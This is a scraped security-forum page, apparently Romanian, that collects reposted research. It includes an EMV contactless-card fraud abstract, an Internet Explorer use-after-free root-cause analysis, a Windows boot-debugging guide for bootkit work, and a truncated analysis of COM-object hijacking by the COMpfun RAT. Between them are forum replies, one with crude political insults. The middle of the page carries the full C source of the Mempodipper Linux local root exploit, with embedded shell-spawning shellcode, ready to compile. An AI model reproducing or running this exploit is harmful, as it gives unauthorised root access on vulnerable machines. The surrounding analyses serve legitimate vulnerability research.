Nytro

Harvesting High Value Foreign Currency Transactions from EMV Contactless Credit Cards without the PIN Martin Emms, Budi Arief, Leo Freitas, Joseph Hannon, Aad van Moorsel School of Computing Science, Newcastle University Newcastle upon Tyne NE1 7RU, United Kingdom {martin.emms, budi.arief, leo.freitas, joseph.hannon, aad.vanmoorsel}@ncl.ac.uk ABSTRACT In this paper we present an attack, which allows fraudulent transactions to be collected from EMV contactless credit and debit cards without the knowledge of the cardholder. The attack exploits a previously unreported vulnerability in EMV protocol, which allows EMV contactless cards to approve unlimited value transactions without the cardholder’s PIN when the transaction is carried out in a foreign currency. For example, we have found that Visa credit cards will approve foreign currency transactions for any amount up to €999,999.99 without the cardholder’s PIN, this side-steps the £20 contactless transaction limit in the UK. This paper outlines our analysis methodology that identified the flaw in the EMV protocol, and presents a scenario in which fraudulent transaction details are transmitted over the Internet to a “rogue merchant” who then uses the transaction data to take money from the victim’s account. In reality, the criminals would choose a value between €100 and €200, which is low enough to be within the victim’s balance and not to raise suspicion, but high enough to make each attack worthwhile. The attack is novel in that it could be operated on a large scale with multiple attackers collecting fraudulent transactions for a central rogue merchant which can be located anywhere in the world where EMV payments are accepted. Download: http://homepages.cs.ncl.ac.uk/budi.arief/home.formal/Papers/CCS2014.pdf

Root Cause Analysis of CVE-2014-1772 – An Internet Explorer Use After Free Vulnerability 11:04 pm (UTC-7) | by Jack Tang (Threats Analyst) We see many kinds of vulnerabilities on a regular basis. These range from user-after-free (UAF) vulnerabilities, to type confusion, to buffer overflows, to cross-site scripting (XSS) attacks. It’s rather interesting to understand the root cause of each of these vulnerability types, so we looked at the root cause of an Internet Explorer vulnerability - CVE-2014-1772. We’d privately disclosed this vulnerability to Microsoft earlier in the year, and it had been fixed as part of the June Patch Tuesday update, as part of MS14-035. While this vulnerability was already patched some time ago, it is still a good example of UAF vulnerabilities in general. The code to trigger this vulnerability is below: Figure 1. HTML code to trigger vulnerability Before debugging, several flags must be set to make the job of analysis easier. Run the command gflags.exe /i iexplore.exe +hpa +ust to to enable the page heap (HPA) and user stack trace (UST) flags. This will make finding memory corruption and tracing heap allocation and frees easier. This file can be found in the Windbg installation folder. You can now run windbg, attach Internet Explorer, and use it to access the HTML file. Examining the JavaScript execution flow, when line 18 of the HTML code is executed, the crash happens: Figure 2. Output of crash We can see the EDI register point to a freed memory space, which leads to an access violation. What is the value of the EDI register? Let us look at the code below. Figure 3. Assembly code The above code tells us that the EDI is from the first argument, which is the CTreePos* type. We can assume the EDI is a pointer of CTreePos. Since the CTreePos object is freed, how can we get where the object is freed? Because the UST flag is set, we can use the !heap -p -a edi command in windbg. Figure 4. Call stack The above figure shows us the call stack of the CTreePos object freed. The call stack has a lot of information. We see the function CMarkup::FreeTreePos; this evidence gives us evidence that the freed object is CTreePos object and that this is a use-after-free issue. Since it is a UAF issue, we want to deeply understand the issue. We need to locate where the CTreePos object is created, where the object is freed, and where the freed object is used again. Figure 4 gives us where the object was freed. To find where is used again, we need to examine the crash point. The call stack is as follows: Figure 5. Call stack How do we find the location where the CTreePos object was created? There are many ways. I prefer to run the sample again, and break the object freed point and use the !heap -p -a xxxx command to trace back to where the object is created. The call stack is as follows: Figure 6. Call stack For UAF problems, I prefer to compare the 3 locations (create, free, use again) to find some clues. Figure 7. Call stacks There are 3 columns in Figure 7. They are call stack trace summaries: from left to right, it is when the object is created, freed, and used again. In the above example, the direction of the stack is from the bottom to the top. There is plenty of useful information here. First, we can find the relationship between the 3 parts. Under the yellow line, CDoc::CutCopyMove is the last identical function in the creation call stack trace and the free call stack trace. This means the execution flow creates the CTreePos object and then frees the object in CDoc::CutCopyMove. Under the red line, the execution flow frees the object and then uses it again (and crashes) in CSpliceTreeEngine::InsertSplice. In the second column, we find the execution flow in the CSpliceTreeEngine::InsertSplice function encounters a failure and call the Fire_onerror function. The function will call the JavaScript object’s onerror event. At the event, the execution will call CMarkupPointer::UnEmbed to free the object. Right away, we have four questions. Why does it trigger an onerror event? Why does it create the CTreePos object? Why does it free the CTreePos object? Why does it use the freed object again? Before answering these questions, I want to summarize some background knowledge about how Internet Explorer’s DOM tree implementation. Because IE is not open source, this information is gathered by reverse engineering, so it may not be 100% accurate. One page has a CMarkup object to represent the page’s skeleton or DOM tree. The CMarkup object contain a pointer to the root CElement object. This is the parent class of many concrete element classes. In Figure 1, the Javascript object e_1 and e_2 are the CObjectElement objects which are inherited from CElement. The CElement object has a pointer to a CTreeNode object. The CTreeNode object also has a pointer to a related CElement object. The CTreeNode’s object has a pair of pointer to CTreePos objects. Why is a CTreePos object needed? This is because IE uses a Splay Tree algorithm to manuiplate the DOM tree. In the Splay Tree, the CTreePos object is the node that is involved in the algorithm. The CMarkupPointer object represents a location in the CMarkup object (DOM tree). So the CMarkupPointer object has a pointer to CTreePos to represent its location. CMarkupPointer has several statuses which are related to UAF issues. Embed status: this means CMarkupPointer created CTreePos, which is added to the Splay Tree. Unembed status: this means CMarkupPointer removes the CTreePos from the Splay Tree and frees it. The following graph describes the interactions involving the splay tree. Figure 8. Splay tree graph Going back to our four questions, we can now attempt to answer them. Why does it trigger an onerror event? From Figure 1?s Javascript code, we can see e_2.onerror sets a handler function. At line 22, e_2.swapNode will trigger DOM tree’s changing; this calls the CObjectElement::CreateObject function. This function checks the object’s CLSID. Because e_2’s CLSID is not set, it triggers the onerror event handler. In the handler, at line 22, the Javascipt code r.insertNode(e_2) will change the DOM tree once again and change CObjectElement::CreateObject as well; because e_2 has no CLSID , it will again trigger the onerror event handler once again. The second time the this handler runs, at r.setEnd(document.all[1],0)” , it frees the CTreePos object. Why does it create the CTreePos object? From Figure 6, the CTreePos object is created in calling the CDomRange::InsertNode function. We can map this function to Figure 1?s line 19: r.insertNode(e_2). The CDomRange::InserNode function will insert elements into the DOM tree. The function is called Doc::CutCopyMove to modify the DOM tree and takes several arguments. The first CMarkupPointer type argument is the source start location in CMarkup (DOM tree) . The second CMarkupPointer type argument is the source end location in CMarkup (DOM Tree). The third CMarkupPointer type argument is the target location in CMarkup (DOM Tree). Doc::CutCopyMove will copy or move the source sub DOM tree to the target location in DOM tree. Because of the use of the Splay Tree algorithm (which uses CTreePos as a node), the function needs to create a CTreePos object and add it to the SplayTree for source CMarkup (DOM tree) and target CMarkup (DOM Tree). Doc::CutCopyMove calls CMarkup::DoEmbedPointers to let the CMarkupPointer change to embed status. Finally, the CTreePos object is created. The UAF CTreePos object is created for the e_1 JavaScript element. Why does it free the CTreePos object? From the call stack trace when the CTreePos object is freed (Figure 4), we can find CDomRange::setEnd. This function can be mapped to line 17 in Figure 1: r.setEnd(e_1,0). That means the CTreePos object is in the implementation of setEnd. The CDomRange::setEnd function wants to replace the original end point with a new end point. This function finally calls CMarkupPointer::MoveToPointer to move to the specific DOM tree location. It will first call CMarkupPointer::UnEmbed to change this CMarkupPointer object to unembed and remove CTreePos from the Splay Tree and free it. The JavaScript code r.setEnd‘s argument is the e_1 element. So the CTreePos object related with the e_1 element is freed. Why does it use the freed object again? In Figure 7, under the red line is the function call for CSpliceTreeEngine::InsertSplice. Column B is CSpliceTreeEngine::InsertSplice+0x13ff. Column C is CSpliceTreeEngine::InsertSplice+0x6EDD4A. Column B is the free call stack trace and Column C is the “used again” crash call stack trace. This means that both “free” and “used again” happen in one function called CSpliceTreeEngine::InsertSplice. We trace the execution flow in this function, and find the following: Figure 9. Assembly code Instruction 636898C4, eax is the address of the UAF CTreePos Objects. The function saves the address to a local variable var_1E4. Then, it proceeds to 6368AA9A. Figure 10. Assembly code At 6368AA9A, it calls a virtual function CObjectElement::Notify. We can find here the call stack trace from Figure 7?s column B. This means when running this call, it encounters an error and calls the onerror event handler . That frees the CTreePos object. However, the CSpliceTreeEngine::InsertSplice function local variable var_1E4 holds a reference to this freed object. It then proceeds to 63D7735B. At 63D7735B , it calls CElment::RecordTextChange ForTsf with var_1E4 as the second argument. When this function is run, if any instruction accesses the contents of the CTreePos object, a crash occurs. Summary In brief, the UAF issue’s root cause is that under the event interaction context, CSpliceTreeEngine::InsertSplice doesn’t handle local variable reference validation properly. DOM is based on event mechanisms. Under complex event interaction contexts, it is a significant challenge to solve UAF issue completely. However, in recent patches Microsoft has introduced memory protection in Internet Explorer, which helps mitigate UAF issues (especially in cases where a UAF object is referenced from the call stack). This highlights one important reason to upgrade to latest versions of software as much as possible: frequently, new techniques that make exploits more difficult are part of newer versions, making the overall security picture better. Trend Micro Deep Security protects users against this particular threat. The following rule, released as part of the regular updates released in June is applicable: 1006036 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-1772) Sursa: Root Cause Analysis of CVE-2014-1772 - An Internet Explorer Use After Free Vulnerability | Security Intelligence Blog | Trend Micro

[h=1]Linux Local Root => 2.6.39 (32-bit & 64-bit) - Mempodipper #2[/h] /*Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.cBlog post about it is here: http://blog.zx2c4.com/749 */ /* * Mempodipper * by zx2c4 * * Linux Local Root Exploit * * Rather than put my write up here, per usual, this time I've put it * in a rather lengthy blog post: http://blog.zx2c4.com/749 * * Enjoy. * * - zx2c4 * Jan 21, 2012 * * CVE-2012-0056 */ #define _LARGEFILE64_SOURCE #define _GNU_SOURCE #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/socket.h> #include <sys/un.h> #include <sys/wait.h> #include <sys/types.h> #include <sys/user.h> #include <sys/ptrace.h> #include <sys/reg.h> #include <fcntl.h> #include <unistd.h> #include <limits.h> char *prog_name; int send_fd(int sock, int fd) { char buf[1]; struct iovec iov; struct msghdr msg; struct cmsghdr *cmsg; int n; char cms[CMSG_SPACE(sizeof(int))]; buf[0] = 0; iov.iov_base = buf; iov.iov_len = 1; memset(&msg, 0, sizeof msg); msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = (caddr_t)cms; msg.msg_controllen = CMSG_LEN(sizeof(int)); cmsg = CMSG_FIRSTHDR(&msg); cmsg->cmsg_len = CMSG_LEN(sizeof(int)); cmsg->cmsg_level = SOL_SOCKET; cmsg->cmsg_type = SCM_RIGHTS; memmove(CMSG_DATA(cmsg), &fd, sizeof(int)); if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len) return -1; close(sock); return 0; } int recv_fd(int sock) { int n; int fd; char buf[1]; struct iovec iov; struct msghdr msg; struct cmsghdr *cmsg; char cms[CMSG_SPACE(sizeof(int))]; iov.iov_base = buf; iov.iov_len = 1; memset(&msg, 0, sizeof msg); msg.msg_name = 0; msg.msg_namelen = 0; msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = (caddr_t)cms; msg.msg_controllen = sizeof cms; if ((n = recvmsg(sock, &msg, 0)) < 0) return -1; if (n == 0) return -1; cmsg = CMSG_FIRSTHDR(&msg); memmove(&fd, CMSG_DATA(cmsg), sizeof(int)); close(sock); return fd; } unsigned long ptrace_address() { int fd[2]; printf("[+] Creating ptrace pipe.\n"); pipe(fd); fcntl(fd[0], F_SETFL, O_NONBLOCK); printf("[+] Forking ptrace child.\n"); int child = fork(); if (child) { close(fd[1]); char buf; printf("[+] Waiting for ptraced child to give output on syscalls.\n"); for ( { wait(NULL); if (read(fd[0], &buf, 1) > 0) break; ptrace(PTRACE_SYSCALL, child, NULL, NULL); } printf("[+] Error message written. Single stepping to find address.\n"); struct user_regs_struct regs; for ( { ptrace(PTRACE_SINGLESTEP, child, NULL, NULL); wait(NULL); ptrace(PTRACE_GETREGS, child, NULL, &regs); #if defined(__i386__) #define instruction_pointer regs.eip #define upper_bound 0xb0000000 #elif defined(__x86_64__) #define instruction_pointer regs.rip #define upper_bound 0x700000000000 #else #error "That platform is not supported." #endif if (instruction_pointer < upper_bound) { unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL); if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */) return instruction_pointer; } } } else { printf("[+] Ptrace_traceme'ing process.\n"); if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0) { perror("[-] ptrace"); return 0; } close(fd[0]); dup2(fd[1], 2); execl("/bin/su", "su", "not-a-valid-user", NULL); } return 0; } unsigned long objdump_address() { FILE *command = popen("objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r"); if (!command) { perror("[-] popen"); return 0; } char result[32]; fgets(result, 32, command); pclose(command); return strtoul(result, NULL, 16); } unsigned long find_address() { printf("[+] Ptracing su to find next instruction without reading binary.\n"); unsigned long address = ptrace_address(); if (!address) { printf("[-] Ptrace failed.\n"); printf("[+] Reading su binary with objdump to find exit@plt.\n"); address = objdump_address(); if (address == ULONG_MAX || !address) { printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n"); printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", prog_name, prog_name); exit(-1); } } printf("[+] Resolved call address to 0x%lx.\n", address); return address; } int su_padding() { printf("[+] Calculating su padding.\n"); FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r"); if (!command) { perror("[-] popen"); exit(1); } char result[256]; fgets(result, 256, command); pclose(command); return strstr(result, "this-user-does-not-exist") - result; } int child(int sock) { char parent_mem[256]; sprintf(parent_mem, "/proc/%d/mem", getppid()); printf("[+] Opening parent mem %s in child.\n", parent_mem); int fd = open(parent_mem, O_RDWR); if (fd < 0) { perror("[-] open"); return 1; } printf("[+] Sending fd %d to parent.\n", fd); send_fd(sock, fd); return 0; } int parent(unsigned long address) { int sockets[2]; printf("[+] Opening socketpair.\n"); if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) { perror("[-] socketpair"); return 1; } if (fork()) { printf("[+] Waiting for transferred fd in parent.\n"); int fd = recv_fd(sockets[1]); printf("[+] Received fd at %d.\n", fd); if (fd < 0) { perror("[-] recv_fd"); return 1; } printf("[+] Assigning fd %d to stderr.\n", fd); dup2(2, 15); dup2(fd, 2); unsigned long offset = address - su_padding(); printf("[+] Seeking to offset 0x%lx.\n", offset); lseek64(fd, offset, SEEK_SET); #if defined(__i386__) // See shellcode-32.s in this package for the source. char shellcode[] = "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3" "\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89" "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd" "\x80"; #elif defined(__x86_64__) // See shellcode-64.s in this package for the source. char shellcode[] = "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48" "\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f" "\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7" "\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50" "\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05"; #else #error "That platform is not supported." #endif printf("[+] Executing su with shellcode.\n"); execl("/bin/su", "su", shellcode, NULL); } else { char sock[32]; sprintf(sock, "%d", sockets[0]); printf("[+] Executing child from child fork.\n"); execl("/proc/self/exe", prog_name, "-c", sock, NULL); } return 0; } int main(int argc, char **argv) { prog_name = argv[0]; if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') return child(atoi(argv[2])); printf("===============================\n"); printf("= Mempodipper =\n"); printf("= by zx2c4 =\n"); printf("= Jan 21, 2012 =\n"); printf("===============================\n\n"); if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o') return parent(strtoul(argv[2], NULL, 16)); else return parent(find_address()); } Sursa: http://www.exploit-db.com/exploits/35161/

Incepe cu asta: Welcome to Linux From Scratch!

Probabil pentru ca uploadezi trojeni.

Cardurile bancare contactless de la VISA, susceptibile la atacuri din cauza unei bre?e de implementare Dorian Prodan - 4 nov 2014 Toate obiectele din jurul nostru vor s? devin? ceva mai „inteligente” ?i s? se ne simplifice via?a, îns? progresul tehnologic ne ofer? uneori ?i surprize nepl?cute. Cel mai recent exemplu afecteaz? cardurile bancare VISA, un grup de cercet?tori din cadrul universit??ii Newcastle din Marea Britanie descoperind o problem? software a sistemului VISA care faciliteaz? furtul banilor de pe cardurile care includ ?i un cip RFID pentru plata contacteless. Implementat ?i la noi în ?ar?, sistemul de plat? payWave de la VISA folose?te un cip RFID cu ajutorul c?ruia posesorul cardului poate valida o tranzac?ie f?r? a mai folosi codul de protec?ie PIN ?i f?r? a mai introduce cardul într-un POS. Deoarece sistemul este gândit pentru pl??ile m?runte f?cute în mod curent ?i nu folose?te autentific?ri manuale suplimentare, VISA ?i b?ncile emitente au stabilit ?i o limit? pentru sumele care pot fi transferate în cadrul unei opera?iuni, îns? acest sistem se pare c? nu func?ioneaz? tot atât de bine pe cât ?i-ar fi dorit institu?iile bancare. Conform lucr?rii publicate de cercet?torii britanici, sistemul VISA poate fi p?c?lit s? valideze tranzac?ii cu o valoare care dep??e?te limita impus? pentru plata contactless atunci când moneda folosit? este alta decât cea curent? folosit? de banca emitent?. Dac? bariera în moneda implicit? func?ioneaz?, utilizarea unei monede str?ine ?i conversia valutar? f?cut? de banc? scurtcircuiteaz? sistemul de protec?ie VISA ?i permite validarea contactless a unor tranzac?ii cu o valoare de cel mult 999.999 de dolari. Cercet?torii afirm? c? aceast? bre?? poate fi speculat? de cei care vor folosi o metod? ingenioas? prin care datele de pe un card bancar contactless pot fi accesate f?r? ?tirea utilizatorului. Acum doi ani, cercet?torii viaForensic au ar?tat c? pe un telefon Android echipat cu cip NFC pot fi instalate aplica?ii speciale care imit? un POS ?i determin? cardul bancar s? încerce s? se autentifice ?i s? semneze o tranzac?ie. Cercet?torii din cadrul universit??ii Newcastle afirm? c?, folosind aceast? metod?, persoanele r?u inten?ionate pot preg?ti un astfel de telefon, pot ini?ia o tranzac?ie ?i pot încerca s? treac? pe lâng? persoanele str?ine în locuri aglomerate în speran?a c? unul dintre cardurile din buzunarele acestora vor trece suficient de aproape de ei pentru a putea valida tranzac?ia. VISA Europe afirm? c? metoda descoperit? de cercet?torii britanici nu reprezint? o problem? real?. Compania afirm? c? efectuarea unor astfel de pl??i frauduloase este extrem de dificil? dincolo de u?ile laboratorului, în lumea real?. Compania nu a oferit înc? o declara?ie referitoare la problema care permite ocolirea limitelor de sum? stabilite pentru tranzac?iile contactless. Sursa: Cardurile bancare contactless de la VISA, susceptibile la atacuri din cauza unei bre?e de implementare

_|_ Pana pe vreo 20 sa avem si timp sa le imprimam.

[h=3]Debugging Early Boot Stages of Windows[/h] Recently, I have spent some time for reverse engineering bootkit. It has been a fun exercise, but I had to struggle for setting up the environment before that as I could not find a page explains these steps. So as a note for me, I wrote down how to build a bootkit debugging environment as well as how to configure Windows in order to attach a debugger at some early uncommon boot stages. [h=3][/h] [h=3]Boot Processes[/h] Here are boot processes of BIOS based Windows XP and Windows 7 systems. I will discuss each stage except for BIOS (POST) and Ntoskrnl.exe. [h=4][/h] [h=4][/h] [h=4]Boot Process (XP)[/h] BIOS (POST) -> MBR -> VBR -> Ntldr (Real-Mode) -> Ntldr (Protected-Mode) -> Ntoskrnl.exe [h=4]Boot Process (Windows 7)[/h] BIOS (POST) -> MBR -> VBR -> Bootmgr (Real-Mode) -> Bootmgr (Protected-Mode) -> Winload.exe -> Ntoskrnl.exe [h=3]Debugging[/h] [h=4]MBR, VBR, Ntldr (Real-Mode) and Bootmgr (Real-Mode)[/h] We need Bochs as no break points are provided on the course of these steps. Installing OS on Bochs is not hard unless you try to find the perfect configurations such as smooth mouse movement, correct clock speed and working NICs. Since we are not going to use this OS anything but boot debugging, I do not encourage you to spend time for it. What you need to do to install OS are roughly as follows: Create a flat hard disk image with 10GB size using bximage.exe. Configure bochs.bxrc with boches.exe to use the created hard disk image and an OS installer ISO image. Start to install OS. Installation may take a few hours. I also strongly recommend you to use the latest version of Bochs to avoid unnecessary troubles. Even if your old IDA Pro does not work with the latest one like my case, you can switch to old one after you completed the installation process for debugging. Here are my bochsrc files for version 2.6.6 and 2.4.6 with nearly identical configurations. You may use them as samples when you are not familiar with Bochs. Once you have finished installing the OS (no need for applying Windows updates), you can debug MBR and VBR with either running it with bochsdbg.exe or corroborating with IDA Pro. If you hope to take the former way, you can add the following settings to enable a GUI debugger. ---- display_library: win32, options="gui_debug" ---- Although the GUI debugger works perfectly fine, it is far better to use IDA Pro if you have. Here is an article about this process by HeyRays, but in a nutshell, you can follow these steps: Download a file mentioned in the article. Copy mbr.py to the same directory as a location of the hard disk image file. Download and copy this batch file to the same directory (you will need to change paths in it). Run the batch file. You will see IDA Pro breaks at the very beginning of MBR (0x7c00) unless there is an error in configurations. Now, you can trace the code and should be able to debug VBR as well. [h=4]Ntldr (Real-Mode) and Bootmgr (Real-Mode)[/h] Although it is totally possible to trace the code until it reaches to Ntldr or Bootmgr, it can be time consuming. One solution is to modify their entry point code with a breakpoint. Luckily, offset 0 of these files are actually entry points, so we can change offset 0 to a breakpoint. Here is an original entry point of Ntldr. Also, as we are using a flat hard disk image file, we can search code pattern of Ntldr or Bootmgr from the image file and change it. In my case, Ntldr was found at offset 0x133D55E00 in the image file. Like the above image, you will probably need to install a magic_break provided by Bochs rather than regular 0xCC since the runtime environment is different from usual, the protected mode. Bochs treats an instruction 'xchg bx, bx' (0x87 0xdb) as a breakpoint when the following statement was added to the bochsrc. ---- magic_break: enabled=1 ---- Once you boot the virtual machine with Bochsdbg.exe, you should see the VM breaks at 0x2:0002. 0x2:0000 is the actual breakpoint which we have set. You can look an IDA to find where to go from here. In my case, the execution need to go to 0x01d8. Then you can change EIP with a 'set $eip = 0x01d8' command and step in with a 's' command to execute a regular code sequence. Note that my Old IDA Pro (v6.0) did not stop when execution reached at a magic_breakpoint, but this issue may have already been solved on the latest version of IDA. [h=4][/h] [h=4]Ntldr (Protected-Mode)[/h] Steps for debugging Ntldr (Protected-mode) is relatively straightforward: Download and extract Ntldr of the checked build version. Open the extracted Ntldr with a hex editor and find an 'MZ' header in it. Copy all contents after that and save it on a debugger system. We assume that you saved it as E:\osloader.exe in this article. This part contains protected mode code of Ntldr. Overwrite existing C:\ntldr with the extracted Ntldr (not osloader.exe). Add the following [debug] section in boot.ini. ---- [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [debug] /debug /debugport=COM1: /baudrate=115200 /debugstop [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional (Debug)" /noexecute=optin /fastdetect /debug /debugport=COM1: /baudrate=115200 ---- Once you reboot the debugee XP system, it waits to be connected by a kernel debugger. In order to load symbols and suppress error messages, you can manually read an osloader.exe image. ---- kd> .readmem E:\osloader.exe 0x400000 L0x1000 Reading 1000 bytes.. kd> .imgscan /l /r 00400000 MZ at 00400000 - size 80000 Name: osloader.EXE Loaded osloader.EXE module ---- Now, you are free to see how Ntoskrnl.exe and boot drivers are initialized. [h=4]Bootmgr (Protected-Mode)[/h] Bootmgr is called the boot manager and responsible for listing a boot menu and firing up an appropriate program according to a user's selection in the list. Unlike debugging Ntldr, you can activate the boot manager debugger with the following commands. ---- bcdedit /bootdebug {bootmgr} on ---- Fore more details, you can consult MSDN, BCDEdit /bootdebug. Note that the executable file is located in C:\Windows\Boot\PCAT\bootmgr and contains a 32bit PE image as with Ntldr. [h=4]Winload.exe[/h] Winload.exe is called the boot loader and used for the regular boot procedure. It basically loads Ntoskrnl.exe and some other boot drivers. Enabling the boot loader debugger can be simply done with bcdedit like the case of Bootmgr. ---- bcdedit /bootdebug on ---- [h=4][/h] [h=3]Further Research[/h] Difference in Windows 10. When the processor mode is changed to the long mode on the x64 system. QEMU may be better in terms of installing OSs in it. Sursa: Satoshi's note: Debugging Early Boot Stages of Windows

Da. @Gecok @ ENCODED - Ceva idei? Dam de beut.

Sugestie: afiseaza si tu ceva inainte de a te inregistra, gen "Ultimele adaugate". Adica daca cineva nu e logat vede doar formularul de login si nu stie despre ce e vorba => o sa Alt + F4. Nota: Daca vrei sa vinzi asa ceva, trebuie sa le VERIFICI. Si asta inseamna ca cei care cumpara de pe site trebuie sa aiba incredere in tine. "Vii si iti pui site-ul in db si ai acces la toate vulnerabilitatile gasite in el" - Atunci cum e, ca "atacator", sa vin sa postez vulnerabilitati gasite, cand owner-ul le vede si le repara?

Probleme semnalizate la alegeri: - lipsa formularelor pentru declaratii (mai ales Bucuresti) - Guvernul (Muie Ponta) - lipsa buletinelor de vot din strainatete - Guvernul (Muie Ponta) - la o sectie au disparut subit 400 de buletine de vot - PSD (Muie Ponta) - au fost reclamate autocare cu muncitori veniti sa voteze - PSD (Muie Ponta) - s-au primit mesaje care indemnau lumea sa voteze cu - PSD (Muie Ponta) - s-au impartit flyere prin care ziceau ca maresc pensiile - PSD (Muie Ponta) Si probabil multe altele. Asadar, dragi labagii, daca nu iesiti la vot, astia or sa va conduca. Nota: Cred ca avem SEO pe keyword-urile "muie ponta"

Pai da, sa faca niste modele pentru toata lumea.

Salut, As vrea un model pentru tricou, de luat la Defcamp. Nu ma pricep la Photoshop dar sunt pe aici cateva persoane care se pricep. Nu stiu ce detalii sa ofer: - verde deschis - text: RST/Romanian Security Team - shellcode/assembler - logo ... Mai e un topic aici despre acest subiect. Cine mai vrea tricou? Are cineva timp sa incerce sa faca 2-3 modele? Putem plati. Thanks!

30.10.2014, Author: Paul Rascagneres COM Object hijacking: the discreet way of persistence An Analysis of a new persistence mechanism in the wild G DATA SecurityLabs experts discovered a new Remote Administration Tool, which we dubbed COMpfun. This RAT supports 32-bit and 64-bit Windows versions, up to the Windows 8 operating system. The features are rather common for today’s espionage tools: file management (download and upload), screenshot taking, Keylogger functionality, code execution possibility and more. It uses the HTTPS and an asymmetric encryption (RSA) to communicate with the command and control server. The big novelty is the persistence mechanism: the malware hijacks a legitimate COM object in order to be injected into the processes of the compromised system. And it is remarkable, that this hijacking action does not need administrator rights. With this RAT, Attackers could spy on an infected system for quite a long time, as this detection evasion and persistence mechanism is indeed pretty advanced! What is a COM object? COM (Component Object Model) is described by Microsoft as “platform-independent, distributed, object-oriented system for creating binary software components that can interact”. The purpose of this technology is to provide an interface to allow developers to control and manipulate objects of other applications. We already spoke about this technology in the IcoScript case. Each COM object is defined by a unique ID called CLSID. For example the CLSID to create an instance of Internet Explorer is {0002DF01-0000-0000-C000-000000000046}. COM object hijacking analysis During the installation phase, the malware drops two files into the directory: %APPDATA%\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\ The file names are created using the following scheme: api-ms-win-downlevel-[4char-random]-l1-1-0._dl One file is the 32-bit version of the malware and the second one is the 64-bit version. The second step: the creation of two registry entries: HKCU\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32 HKCU\Software\Classes\Wow6432Node\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E }\InprocServer32 For each entry, the default value is the path to the files that were dropped before. In the following screenshot, the file containing rhwm is the 64-bit version of the malware and the file containing dtjb was created for the 32-bit version, respectively. =YTo1OntzOjU6IndpZHRoIjtzOjQ6IjgwMG0iO3M6NjoiaGVpZ2h0IjtzOjQ6IjYw&parameters[1]=MG0iO3M6NzoiYm9keVRhZyI7czo0MToiPGJvZHkgc3R5bGU9Im1hcmdpbjowOyBi&parameters[2]=YWNrZ3JvdW5kOiNmZmY7Ij4iO3M6NToidGl0bGUiO3M6NDk6IkNPTSBvYmplY3Qg&parameters[3]=ZGVmaW5pdGlvbiAoNjQtYml0KSAtIENsaWNrIHRvIGVubGFyZ2UiO3M6NDoid3Jh&parameters[4]=cCI7czozNzoiPGEgaHJlZj0iamF2YXNjcmlwdDpjbG9zZSgpOyI%2BIHwgPC9hPiI7&parameters[5]=fQ%3D%3D"] =YTo1OntzOjU6IndpZHRoIjtzOjQ6IjgwMG0iO3M6NjoiaGVpZ2h0IjtzOjQ6IjYw&parameters[1]=MG0iO3M6NzoiYm9keVRhZyI7czo0MToiPGJvZHkgc3R5bGU9Im1hcmdpbjowOyBi&parameters[2]=YWNrZ3JvdW5kOiNmZmY7Ij4iO3M6NToidGl0bGUiO3M6NDg6IkNPTSBvYmplY3Qg&parameters[3]=ZGVmaW5pdGlvbiAoMzItYml0KSAtIENsaWNrIHRvIGVubGFnZSI7czo0OiJ3cmFw&parameters[4]=IjtzOjM3OiI8YSBocmVmPSJqYXZhc2NyaXB0OmNsb3NlKCk7Ij4gfCA8L2E%2BIjt9"] The purpose of the keys is to define a COM object with the CLSIDs {b5f8350b-0548-48b1-a6ee-88bd00b4a5e7} and {BCDE0395-E52F-467C-8E3D-C4579291692E}. If these objects are instanced, the library will be loaded into the respective process. But the CLSIDs are predefined by Microsoft and the newly created owns replace the originals: {b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}: the CLSID of the class CAccPropServicesClass. {BCDE0395-E52F-467C-8E3D-C4579291692E}: it’s the CLSID of the class MMDeviceEnumerator. These two instances are used by a lot of applications, for example by the browser (by using the CoCreateInstance() function). With Process Explorer, we are able to list the library loaded into a specific process. Here are the loaded libraries designed for a 32-bit process: 